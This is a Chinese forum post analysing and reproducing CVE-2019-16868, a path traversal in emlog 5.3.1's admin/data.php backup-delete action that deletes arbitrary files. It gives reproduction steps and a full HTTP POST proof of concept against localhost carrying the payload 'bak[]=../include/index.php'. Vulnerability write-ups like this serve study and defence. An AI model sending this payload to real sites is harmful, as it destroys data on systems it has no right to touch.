外链论坛

 找回密码
 立即注册
搜索
查看: 25|回复: 1

CVE-2019-16868-emlog安全漏洞分析复现

[复制链接]

3001

主题

3万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99109178
发表于 2024-10-3 18:45:45 | 显示全部楼层 |阅读模式

0x01 前言

emlog是 "Every Memory Log" 的简叫作,意即:点滴记忆。

它是一款基于PHP语言和MySQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统。基于PHP和MySQL的功能强大的博客及CMS建站系统。

0x02漏洞分析

代码问题 - admin/data.php

复现过程

环境:emlog 5.3.1

登录管理并查看/admin/data.php?action=dell_all_bak

利用burpsuite截获删除数据包

在include文件夹下创建index.php

在bak[]后面写上../include/index.php

返回302,表率成功。

include文件夹index.php文件已成功删除

0x03 POC

Host: 127.0.0.1

Content-Length: 28

Cache-Control: max-age=0

Origin: http://127.0.0.1

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Referer: http://127.0.0.1/admin/data.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: page_iframe_url=http://127.0.0.1/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; PHPSESSID=u91v66ktst9vrva3ueb6333kt2; EM_AUTHCOOKIE_WtaQDRqaTBRof8EENT0LY3HNhJzryEPL=admin%7C%7Ce4739a735508976ba1d54ac95a78be3b; EM_TOKENCOOKIE_55cd567609038eefc9aaa8c1c0e141e1=d0025af7e912a4cc8b114e2f6cda6597

Connection: close

bak%5B%5D=../include/index.php

0x04 修复意见

emlog已知这个漏洞,相信官方火速会发布相应补丁。





上一篇:机械革命无界15 Pro新品开售!搭载的配置怎么样?
下一篇:原创 3-1到1-0!阿森纳太狠了,5连斩前英超冠军,37岁老将狂轰11球
回复

使用道具 举报

3001

主题

3万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99109178
 楼主| 发表于 2024-10-18 16:33:35 | 显示全部楼层
感谢你的精彩评论,带给我新的思考角度。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站点统计|Archiver|手机版|小黑屋|外链论坛 ( 非经营性网站 )|网站地图

GMT+8, 2024-11-24 23:46 , Processed in 0.124746 second(s), 21 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.